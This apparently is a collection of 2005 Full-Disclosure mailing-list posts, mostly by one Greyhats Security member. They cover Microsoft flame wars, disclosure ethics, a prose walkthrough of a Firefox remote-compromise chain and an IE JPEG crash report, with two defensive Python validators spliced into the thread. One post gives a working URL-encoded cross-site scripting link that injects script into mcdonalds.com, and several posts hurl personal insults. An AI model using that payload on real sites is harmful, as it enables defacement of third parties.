Re: [Full-disclosure] Re: MS not telling enough
I respect your right to have an opinion, however I do not respect the fact that your opinion completely sucks ass. I mean seriously man, when has MS really become that bad? So many more people run Windows than run Linux, and you know it's true, and it's never going to change. There is not a god damn thing you nor anybody else on this list can do about it. I know I will be shunned for saying this, but who cares what people think if all they do is waste their time trying to do something as stupid as bring down Microsoft?

As for your statement that Microsoft purposefully harms others, that is a completely ignorant thing to say, and you are downright stupid for saying it. If it is the customers that you are talking about, then I am not going to even bother to argue with you, because that would be the dumbest thing that I have heard in my life. However, if by "others" you mean the open source community, then you, sir, have no idea of the concept known as "capitalism". It's this great thing where you actually get paid for what you spend your time doing! Wow! Microsoft practices capitalism, and is, quite frankly, very good at it. Sure you can go around shouting, "Down with Microsoft, down with Microsoft!" but have you ever stopped to think, "Why do I hate Microsoft? Have they done anything wrong? Or am I just blowing smoke?" Give me one SPECIFIC example, Mr. Coombs, of why you personally have something against Microsoft, and I will get off your back. However, it is my personal opinion that you are just conforming to the mindset of the rest of the anti-MS fanatics. I am sick and tired of the stupidity that crowds this earth.

Regards,
Paul
Greyhats Security
http://greyhatsecurity.org

Let the flame wars begin!

-- Original message from "Jason Coombs" [EMAIL PROTECTED]: --

So there ya go. I suppose you'll find something new to complain about, or to be rude about.

Whenever possible, yes. It's amazing how much you support Microsoft. Don't you know that it is in the continued support that you give them that they derive their continued opportunities to harm others? Of course, the more you and others support Microsoft, the more your expertise grows in value.

Compare your decision-making and ethics to the decisions made by me and others who, after hard work and sacrifice to gain over a decade worth of training, education, skill and work experience with Microsoft products, grew to understand that it causes harm to the entire world for us to apply that skill in any fashion that helps Microsoft. I swore an oath never again to apply my skills in a way that helps Microsoft. ... or to help any other organization that knowingly causes harm with reckless disregard for the well-being of others. Integrity, competency, and those who prove they are good people must be supported, and anyone who lacks integrity, competency, and has proven they are bad must be opposed. To do otherwise demonstrates the same self-serving and wrong thinking that enables Microsoft to con its victims in the first place.

Glad to see Microsoft give an opinion that more clearly explains that their Windows 2000 product is inherently defective and shouldn't be used if you intend to connect it to a computer network. That was the conclusion that I arrived at after performing a forensic review of IIS 5.0 -- you'll find my analysis contained within my book about IIS security:

http://www.science.org/jcoombs/
http://www.forensics.org/IIS_Security_and_Programming_Countermeasures.pdf

Best,
Jason Coombs
[EMAIL PROTECTED]

-Original Message-
From: "Kurt Seifried" <[EMAIL PROTECTED]>
Date: Thu, 18 Aug 2005 11:00:04
To: <[EMAIL PROTECTED]>
Subject: MS not telling enough

They just updated MS05-039.

Windows 2000 systems are primarily at risk from this vulnerability. Windows 2000 customers who have installed the MS05-039 security update are not affected by this vulnerability. If an administrator has disabled anonymous connections by changing the default setting of the RestrictAnonymous registry key to a value of 2, Windows 2000 systems would not be vulnerable remotely from anonymous users. However, because of a large application compatibility risk, we do not recommend customers enable this setting in production environments without first extensively testing the setting in their environment. For more information, search for RestrictAnonymous at the Microsoft Help and Support Web site.

So there ya go. I suppose you'll find something new to complain about, or to be rude about.

-Kurt

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The best 0-day exploit source
Hey, I know some 0-days! However, they took a while to find, so what are you gonna give me for them, Mr. Ahmad? A guarantee that I will be visiting a website one day and be infected by a virus that you wrote with my exploit? No thanks, I have better plans for my hard work. How about you stop spamming this already noobish list and try something you might be better at (like serving me fries at McDonald's).

Thanks
Paul
Greyhats Security
http://greyhatsecurity.org

-- Original message from Daniel [EMAIL PROTECTED]: --

Is it me or has anyone else noticed that the overall skill factor for people "doing security" has diminished to such a low level that one shudders at the thought? Ahmad, try these (and yes, you're gonna pay for them unless you code your own):

http://archives.neohapsis.com/archives/fulldisclosure/2005-07/0583.html

Dave Aitel's CANVAS
http://www.immunitysec.com/products-canvas.shtml

but here is a hint... 0hdayz are kinda sekrit and not publicly available, no matter what you read in book title here

On 8/10/05, Ahmad N <[EMAIL PROTECTED]> wrote:

Hi there, I'm looking for the best 0-day exploit source, a source I can really count on for the newest and most reliable exploits. Can anybody suggest a website??? Thx
Re: [Full-disclosure] Compromising pictures of Microsoft Internet Explorer!
I do not mean to flame you, but you are an irresponsible disgrace to the hacking community. Do you not care about the customer? You never publicly disclose details of a vulnerability of this magnitude. This is an image vulnerability, for crying out loud. What's the first thing they tell you to do when most vulnerability details are released? Disable active scripting. That doesn't work here. What are the innocent, ignorant computer users going to do? Disable images? I think not. You should be ashamed.

I firmly believe that you are deceiving us when you say you had a hard time with [EMAIL PROTECTED]; in fact, I don't even think that you have ever once in your life reported a vulnerability to them responsibly. Otherwise, you would not have such harsh feelings about them. If the evil of the stereotypical Microsoft machine exists anywhere on the campus in Redmond, it will not be found in the building of MSRC, which is where your [EMAIL PROTECTED] emails are directed.

Come on man. I know you have talent. You are a good researcher of computer security. But if your talent is going to be wasted like this, you are nothing more to us than a script kiddie.

Regards,
Paul
Greyhats Security
http://greyhatsecurity.org

-- Original message from Michal Zalewski [EMAIL PROTECTED]: --

Synopsis:

Well, not really. Instead, at the risk of boring you to death, I'd like to report on a casual 30-minute experiment I've conducted of recent. This experiment resulted in identifying a potential remote code execution path in Microsoft Internet Explorer, plus some other bugs, and should be a good starting point for further testing of other browsers or similar programs.

Discussion:

You might remember the 'mangleme' affair, where various browsers were subjected by yours truly to a trivially constructed malformed HTML crash-course - all that in order to find exploitable input handling flaws. Back then, MSIE performed admirably compared to other browsers (although did not escape some embarrassment when [EMAIL PROTECTED] found the infamous IFRAME bug that way):

http://lcamtuf.coredump.cx/mangleme/gallery/

Of recent, I decided to try something completely different and radically new, without having to do any actual work. I used the same META REFRESH auto-test framework to check for image decompression and parsing flaws (JPEG, GIF, PNG), as opposed to making fun of HTML renderers. I used a simple index.cgi script (attached, though hardly noteworthy) to dynamically generate a page that references ten just as dynamically created images. These images were prepared by running a test set of pictures (some regular ones, and several pathological cases created with ImageMagick) through a slightly modified version of my old afx utility.

Surprisingly, it is MSIE and its proprietary JPEG decoder (apparently not shared with other Windows components?) that performed embarrassingly poorly this time. Results below.

Vulnerability examples:

NOTE #1: As with mangleme, this list of problems is most certainly NOT exhaustive, and performing longer tests or improving the technique would most likely result in additional findings.

Several MSIE crash sample files from that 30-minute run are available at:

http://lcamtuf.coredump.cx/crash/

Note that these may produce different results depending on program versions, plugins and configuration. Tested with WinXP Pro PL 2600.xpsp2.050301-1526 SP1, MSIE PL 6.0.2800.1106, up-to-date.

mov_fencepost.jpg - on most platforms, causes a crash due to mov destination fencepost error after going past allocated memory, or after accessing a bogus address such as 0x27272727. The destination address appears to be controllable (i.e. changing the file or displaying other data before or along with this image alters it). My bets are that this is exploitable for remote execution.

cmp_fencepost.jpg - here, causes a crash due to a very similar cmp fencepost (no write). Not necessarily exploitable for remote code execution, unless code execution path can be affected later on.

oom_dos.jpg - usually causes an OOM crash. Less interesting, unless you like to punish people who borrow your pictures for their blogs.

random.jpg - causes mov fencepost of CPU consumption + crash. Didn't investigate in much detail.

NOTE #2: MSIE comes with no sources, and reverse engineering is naughty. I didn't examine the renderer to see what went wrong; I see unbounded, user-dependent memory accesses, and that spells trouble.

Vendor notification:

It is my experience that reporting and discussing security problems with Microsoft is a needlessly lengthy process that puts too much burden and effort on the researcher's end, especially if you just have a crash case, not a working exploit; hence, they did not get an advance notice.

Bonus (OT)

Since piggyback request smuggling and
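The crash classes Zalewski lists (a decoder walking past its allocation on a bad length field, and an image whose declared size exhausts memory) are exactly what a defender can screen for before an untrusted image reaches a native decoder. The walker below is an added example written for this page, not code from the post and not part of the afx or mangleme tooling it mentions: it steps through the JPEG marker segments ahead of the scan data and reports length fields that overrun the buffer and frame dimensions above a pixel budget. The sample inputs are constructed inline and are not the files from lcamtuf's crash directory.

```python
import struct

# JPEG marker = 0xFF followed by a marker code.
SOI = b"\xff\xd8"
EOI = b"\xff\xd9"
# Start-Of-Frame codes (all SOFn except DHT 0xC4, JPG 0xC8 and DAC 0xCC).
SOF_MARKERS = {0xC0, 0xC1, 0xC2, 0xC3, 0xC5, 0xC6, 0xC7,
               0xC9, 0xCA, 0xCB, 0xCD, 0xCE, 0xCF}


def check_jpeg_structure(data, max_pixels=50_000_000):
    """Walk the marker segments that precede the entropy-coded scan and return
    a list of structural problems (an empty list means the header is sane).

    Every segment length field counts its own two bytes. A length that points
    past the end of the buffer is the kind of input that pushes a decoder's
    read or write pointer beyond its allocation; an absurd frame size is what
    drives an out-of-memory failure. Both are rejected here, before decoding.
    """
    problems = []
    n = len(data)
    if not data.startswith(SOI):
        return ["missing SOI marker"]
    pos = 2
    while pos < n:
        if data[pos] != 0xFF:
            problems.append(f"offset {pos}: expected marker prefix 0xff, got 0x{data[pos]:02x}")
            return problems
        while pos < n and data[pos] == 0xFF:  # 0xFF fill bytes before a marker are legal
            pos += 1
        if pos >= n:
            problems.append("truncated: marker prefix at end of data")
            return problems
        marker = data[pos]
        pos += 1
        if marker == 0xD9:  # EOI: the whole structure was walked
            return problems
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM / RSTn carry no length field
            continue
        if pos + 2 > n:
            problems.append(f"marker 0x{marker:02x}: truncated length field")
            return problems
        seg_len = struct.unpack(">H", data[pos:pos + 2])[0]
        if seg_len < 2:
            problems.append(f"marker 0x{marker:02x}: length {seg_len} is smaller than the length field itself")
            return problems
        if pos + seg_len > n:
            problems.append(f"marker 0x{marker:02x}: length {seg_len} runs {pos + seg_len - n} bytes past end of data")
            return problems
        if marker in SOF_MARKERS and seg_len >= 7:
            # SOF payload layout: precision(1) height(2) width(2) components(1) ...
            height, width = struct.unpack(">HH", data[pos + 3:pos + 7])
            if width == 0 or height == 0:
                # Height 0 is legal JPEG (DNL), but a pre-screen has no reason to accept it.
                problems.append(f"SOF 0x{marker:02x}: zero dimension {width}x{height}")
            elif width * height > max_pixels:
                problems.append(f"SOF 0x{marker:02x}: {width}x{height} = {width * height} pixels exceeds budget of {max_pixels}")
        if marker == 0xDA:  # SOS: entropy-coded data follows, structural walk ends
            return problems
        pos += seg_len
    problems.append("missing EOI marker")
    return problems


# --- Constructed sample inputs (not the files from the post) ---------------

def _segment(marker, payload):
    """Build FF <marker> <length incl. its own 2 bytes> <payload>."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


def _sof0(height, width):
    """Baseline SOF0 for an 8-bit, single-component image of the given size."""
    return _segment(0xC0, b"\x08" + struct.pack(">HH", height, width) + b"\x01\x01\x11\x00")


APP0 = _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
SOS = _segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")

GOOD_SAMPLE = SOI + APP0 + _sof0(8, 8) + SOS + b"\x00" + EOI
HUGE_SAMPLE = SOI + APP0 + _sof0(0xFFFF, 0xFFFF) + SOS + b"\x00" + EOI        # OOM-style declared size
BAD_LENGTH_SAMPLE = SOI + b"\xff\xe0" + struct.pack(">H", 0xFFFF) + b"JFIF"  # length field overruns the file
NO_EOI_SAMPLE = SOI + APP0                                                    # cut off before the frame

if __name__ == "__main__":
    for name, blob in [("good", GOOD_SAMPLE), ("huge", HUGE_SAMPLE),
                       ("bad_length", BAD_LENGTH_SAMPLE), ("no_eoi", NO_EOI_SAMPLE)]:
        print(name, check_jpeg_structure(blob) or "ok")
```

The walker stops at SOS on purpose: the entropy-coded scan has no length fields to verify, and what matters for a pre-screen is that every header segment is inside the buffer and the frame is within budget before any pixel memory is allocated.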
Re: [Full-disclosure] ICMP Security Vulnerabilities - NEW (cough)
Well-written and easy to follow. Good job.
Re: [Full-disclosure] Benign Worms
-- Original message from "Eric Paynter" [EMAIL PROTECTED]: --

On Fri, May 13, 2005 3:49 pm, Benjamin Franz said:

There are many laws that turn on facts rather than intent.

"Lack of criminal intent does not shield a citizen from the BATF. In United States v. Thomas, the defendant found a 16-inch-long gun while horseback riding. Taking it to be an antique pistol, he pawned it. But it turned out to be a short-barreled rifle, which should have been registered before selling. Although the prosecutor conceded that Thomas lacked criminal intent, he was convicted of a felony anyway.[64] The Supreme Court's decision in United States v. Freed declared that criminal intent was not necessary for a conviction of violation of the Gun Control Act of 1968.[65]"

David Kopel, in "Trust The People: The Case Against Gun Control"

I think we're getting a little into an argument of semantics. The defendant did in fact *intend* to sell the weapon, which was against the law to do. He just wasn't aware of the law. Ignorance of the law does not protect you. Try these two scenarios out:

1. I kill somebody with the intent to kill, and then I claim I didn't know killing was illegal. Most courts would still say murder.

2. I kill somebody because they are attacking me with a lethal weapon. I know killing is illegal, but my intent is not to kill the other person, but rather to save myself, and the only way to save myself is to use lethal force. If I can *prove* my intent was to save myself, then it is not murder.

Back to the original argument, if the intent is to patch PCs for which I have the authority to patch, then I'm not doing anything illegal, no matter what kind of software I create to do it. Even if the worm that I create somehow gets out, but I can *prove* my intent was for it to not get out, then even though releasing a worm is illegal, the worst I might get is criminal negligence for not taking the proper precautions.

Anyhow, I think we all agree that writing a worm to do patch management is generally a bad idea.

-Eric

--
arctic bears - email and dns services
http://www.arcticbears.com
[Full-disclosure] Firefox 1.0.4 released. Several critical vulnerabilities fixed
Well, it's official. Mozilla Firefox has been updated and can be downloaded from www.getfirefox.com. Many security vulnerabilities have been fixed in this version. Advisories will be made public soon...

Regards,
Paul
Greyhats Security
http://greyhatsecurity.org
[Full-disclosure] Firefox Remote Compromise Technical Details
Firefox Remote Compromise Technical Details

Before I start, I need to say that this thing has been patched on Mozilla's server. If you take a look at any of the extension install pages on their site, you will see that the install function has a bunch of random letters and numbers after it. Even though this would probably be an easy thing to bypass, I am not going to attempt it because of the uselessness of such a bypass. A patch is already in development and so any more work going into fine-tuning this exploit would be a waste of time.

There are three core vulnerabilities being used in my example. A friend of mine (Michael Krax, http://www.mikx.de) helped me with the research. To understand why the example works, one must understand the basics of how Firefox works. Everything you see in Firefox is essentially a webpage being rendered by a compiler. This is what the GUI is made of, and this is why Firefox is so easy to customize. However, it also allows for some security bugs. If one could get one of the chrome pages to request a javascript:[script] URL, that individual would be given complete access to the system, because chrome URLs are given full rights in Firefox.

My example works by tricking the addon install function into displaying an icon with a javascript URL. However, this would not be enough to compromise the system. By default, the install feature only works when called from a page within update.mozilla.org or addon.mozilla.org. Therefore, another (cross site scripting) vulnerability had to be found to call the install feature from mozilla.org. This vulnerability navigates to a javascript page and displays a link (pointing to a mozilla.org page) within a frame that follows the user's cursor. After the user clicks, the link is navigated to, which fires the onload event. This is a buggy event in Firefox because with it we can now access certain parts of the window object that we shouldn't, such as the history object. After the page loads, we use the history object to navigate backwards to the javascript page. The javascript is executed again, now from update.mozilla.org, because when we navigated backwards, we essentially navigated to a javascript:[script] page. Now we call the install addon feature, which displays a dialog with details of the requested addon, including an image with a specified image. This image points to a javascript:[script] URL, which gets executed in the context of chrome. Now we have compromised the system :)

Whew, that was quite a mouthful.

I am still trying to gather all the details as to how my research was leaked, but recent conversations are leading me to believe that it was a misplacement of trust, not a server compromise. However, I do not want to jump to conclusions too quickly, as this will only lead to more problems. That's all I will say about that subject, as I don't want to offend anybody. Also, I would like to let everyone know that this is not the only vulnerability that Mikx and I have found. We still have a couple of tricks up our sleeves, and you can be sure that we will not make the same mistake twice.

If you want to see the original PoC, here is the URL: http://greyhatsecurity.org/vulntests/ffrc.htm

Paul
Greyhats Security
http://greyhatsecurity.org
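The chain described above hinges on two checks that the install dialog did not make strictly enough: the icon URL was treated as something the chrome-privileged dialog could dereference, and the origin check could be satisfied by a javascript: document reached through history navigation. The validator below is an added example written for this page, not Firefox's own code and not the PoC: it checks every URL in an install request on its own, requiring a real http(s) host both for fetched resources and for the requesting page, so that neither a javascript: icon URL nor a javascript: requesting document gets through. The trusted host names are the ones the post names; the request URLs in the usage block are constructed.

```python
from urllib.parse import urlsplit

# Schemes the install dialog may fetch and render (icons, packages).
ALLOWED_RESOURCE_SCHEMES = {"http", "https"}
# Hosts allowed to trigger the install dialog, as named in the post above.
TRUSTED_INSTALL_HOSTS = {"update.mozilla.org", "addon.mozilla.org"}


def _parse_strict(url):
    """Parse a URL, refusing non-strings and any ASCII control character or
    whitespace anywhere in it. Browsers ignore some of those while reading the
    scheme, so a validator that tolerated them would disagree with the browser."""
    if not isinstance(url, str) or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in url):
        return None
    return urlsplit(url)  # urlsplit lowercases scheme and hostname for us


def is_plain_web_resource(url):
    """True only for an http(s) URL with an explicit host. javascript:, data:,
    chrome: and scheme-relative values all fail."""
    parts = _parse_strict(url)
    return (parts is not None
            and parts.scheme in ALLOWED_RESOURCE_SCHEMES
            and bool(parts.hostname))


def is_trusted_install_origin(page_url):
    """True only when the requesting document itself is a web page on a trusted
    host. A javascript: document has no host, so it fails no matter which page
    it was reached from through history navigation."""
    parts = _parse_strict(page_url)
    return (parts is not None
            and parts.scheme in ALLOWED_RESOURCE_SCHEMES
            and parts.hostname in TRUSTED_INSTALL_HOSTS)


def install_request_allowed(page_url, package_url, icon_url):
    """Decision to make before the dialog renders anything from the request.
    Each URL is judged on its own, so a trusted origin cannot launder a
    javascript: icon URL into chrome."""
    return (is_trusted_install_origin(page_url)
            and is_plain_web_resource(package_url)
            and is_plain_web_resource(icon_url))


if __name__ == "__main__":
    # Constructed requests with hypothetical paths, not the PoC's URLs.
    page = "http://update.mozilla.org/extensions/moreinfo.php"
    xpi = "http://update.mozilla.org/extensions/example.xpi"
    print(install_request_allowed(page, xpi, "http://update.mozilla.org/extensions/example.png"))
    print(install_request_allowed(page, xpi, "javascript:void(0)"))
    print(install_request_allowed("javascript:history.back()", xpi,
                                  "http://update.mozilla.org/extensions/example.png"))
```

Note that the host check is on the parsed hostname, not on a substring of the URL: user-info tricks such as `http://update.mozilla.org@other.example/` parse to the other host and are rejected, and a lookalike domain that merely starts with the trusted name never matches the set.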
[Full-disclosure] Firefox Remote Compromise Leaked
Well, apparently one of my Firefox vulnerabilities has been leaked. Mikx and I have been working on Firefox security for some time and we are trying to put together something spectacular, but unfortunately there are always those people out there that feel they need to ruin it for people. About a week ago, Mikx and I put together a nice remote compromise for Firefox, submitted it to bugzilla, and got a bug number for it. This is the message that I just got from Bugzilla:

[EMAIL PROTECTED] to me 12:14 am (1 hour ago)

https://bugzilla.mozilla.org/show_bug.cgi?id=292691

[EMAIL PROTECTED] changed:

           What    |Removed                     |Added
                 CC|                            |[EMAIL PROTECTED],
                   |                            |[EMAIL PROTECTED],
                   |                            |[EMAIL PROTECTED],
                   |                            |[EMAIL PROTECTED],
                   |                            |[EMAIL PROTECTED]

--- Additional Comments From [EMAIL PROTECTED] 2005-05-07 21:14 PDT ---

So now someone is claiming a 0day that looks a lot like this. See bug 293302.

So apparently, the secret is out. I wish that this could have been used for good purposes but I guess that just isn't possible these days...

Here is the original PoC: http://greyhatsecurity.org/vulntests/ffrc.htm

I suspect that my server was compromised, and I am currently using my contacts to find the culprit and bring him to justice. Sorry to Mozilla, Mikx, and everyone else that was harmed by the inconsiderate, irresponsible actions of an individual.

Regards,
Paul
[Full-disclosure] Micky-dee's anyone?
To all you people that like McDonalds, here is a quick link that may show you the light:

http://www.mcdonalds.com/app_controller.bumper.bumper.html?_continue=%29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63%65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E%74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%79%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29%3B%3C%2F%73%63%72%69%70%74%3E

Interesting, huh?

Regards,
Paul
Re: [Full-disclosure] [INetCop Security Advisory] Snmppd potentially format string vulnerability.
Japan MUST apologize for what they have done to all Asian countries during WW2.
Education is to teach TRUE history to their children.

History is one thing that CAN NOT be changed.
Japan should follow the German model.

Germany is also a defeated nation, but they feel deeply sorry for what they have done and they teach the REAL history.

The history goes on.

P.S: Sorry for my poor English.

This is a hackers mailing list... Not a politicians one. Please keep politics talk somewhere else; I get enough of that propaganda crap from the news each night.
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broken)
On Wed, Apr 20, 2005 at 05:35:56PM -0700, Day Jay wrote:

Get your wrap-around text fixed you fucking fed!! I'm fed up with you!! Jeezsus, expose yourself as such. hehehe dumfux

I guess there's something to be said for moderated lists, eh?

I don't think that FD is moderated. I believe you're thinking of bugtraq. Day Jay sounds like a real asshat, eh Steve?

Paul
Greyhats Security Group
http://greyhatsecurity.org
Re: [Full-disclosure] How to Report a Security VulnerabilitytoMicrosoft
[EMAIL PROTECTED] wrote:

But think about it, the testing scenarios that exist on planet earth can not possibly be even accounted for, let alone tested in Redmond.

Point made; a large install base requires more testing. But like most things this does not apply to every patch/root-fix. It seems they take their time on the simple fixes too most times.

-- dk

Often times, the simplest of fixes tend to create the most complex architectural problems. Microsoft doesn't focus all their effort on pen-testing their patches; they spend their time mostly on ensuring that 3rd party software is not broken by their patches. That's why the simplest of fixes aren't as simple as they may seem. You only see the solution; Microsoft must dig through several solutions before they find the right one.

Paul
Greyhats Security
http://greyhatsecurity.org
Re: [Full-disclosure] How to Report a Security Vulnerability to Microsoft
hahahahahaha m$ doing social engineering on fd, this is a joke. basically they want your 0days so billg becomes more rich.

Mr. Guninski, although I am a huge fan of your work, I could not disagree more. I am sending this email from Redmond, where I was invited by Microsoft to a small conference about security (it was mostly about what they go through when stuff is reported). "M$", as you call it, is not trying to get your 0days. They simply want to protect customers, and, although a large part about it is profits, the concern is mostly (as far as I know) about the users. Microsoft's biggest fear is wide-spread virus epidemics, so when a critical vulnerability is fully disclosed without prior notice to MSRC, Microsoft goes into an emergency state and everyone gets off of vacation early to come in and help resolve the issue (as was the case with my auto-sp2rc release in December, also called "Paul's Christmas" by MSRC employees). Microsoft knows that security researchers hang out on lists like fd and bugtraq, so what better place to eliminate the common improper disclosing ignorance than to provide clear, concise instructions directly on the security hotspots?

Regards,
Paul
Greyhats Security
http://greyhatsecurity.org
Re: [Full-disclosure] How to Report a Security Vulnerability toMicrosoft
this is basically the same response I had from my OWA advisory ...

VI. VENDOR RESPONSE

Microsoft has reviewed the issue and has made the determination that while a bug fix may be implemented in a future service pack, a security advisory/patch will not be released for this issue

therefore, in the interest of everyone's security, iDefense released the advisory ( as did I ) without a patch being released first. it is quite possible they ( Microsoft ) are trying to make out like they weren't contacted before said advisory was released but that is just my opinion on observation.

my 2 bits,
Donnie Werner

That response was given to me when I reported a DoS vulnerability for Internet Explorer (which, might I add, required user interaction). It simply means that the reported vuln, on a severity scale of 1-10, would pretty much be given a 1. If I'm not mistaken, your OWA vulnerability just spoofs the From address. Although some forms of social engineering MIGHT be possible, there is ultimately no use for something this minor.

Think for a second about how much time and resources, including the human labor required to produce the patch as well as the technology department employees that must install patches on every computer in large corporations, go into making a patch. First of all, there's the whole problem of whether the solution breaks 3rd party software. Also there's a problem with cross-platform software (they do have stuff for Mac, you know). Another thing they have to worry about is how much money and resources it costs companies other than Microsoft to apply the patches. When common people start seeing a lot of patches, they start losing faith in the software, which is bad for Microsoft. Therefore, the bad outweighs the good when determining whether to provide a patch for something as insignificant as your OWA advisory.

I am not saying that I don't respect your efforts. I am just trying to get across the message that Microsoft is not out to get us. Everyone thinks of them as this big evil monopolistic empire, but they're not. By the way, has anyone read Writing Secure Code by some of the guys from Microsoft? It's pretty interesting, and it offers some insight as to what are considered critical vulnerabilities and what are considered vulnerabilities with little or no severity. Believe me when I tell you (as I have had 1 on 1 conversations with many security VIPs at Microsoft Campus) that Microsoft is doing everything that they can to ensure you a safe, enjoyable experience while using their software.

Btw, Mr. Werner, you seem to be among the common group of anti-Microsoft individuals. May I ask what the vendor of your operating system is? What about your browser? Maybe even your word processor or HTML editor? Uh-huh, that's what I thought.

Regards,
Paul
Greyhats Security
http://greyhatsecurity.org

P.S. I do NOT work for Microsoft. I was merely invited to visit their campus and meet some of their people. Very nice bunch of folks they are. We went out to dinner on a couple occasions and had a good time.
Re: [Full-disclosure] How to Report a Security Vulnerability to Microsoft
Dumb question... since this is openly admitted as for profit you are posting this... what are you paying for exploits ? We all know others pay for them.

Your awkward phrasing confuses me. I am not making any profit off of security research. I do not buy vulnerabilities either, nor do I work for Microsoft. My security research is purely a hobby.

Regards,
Paul
Greyhats Security
http://greyhatsecurity.org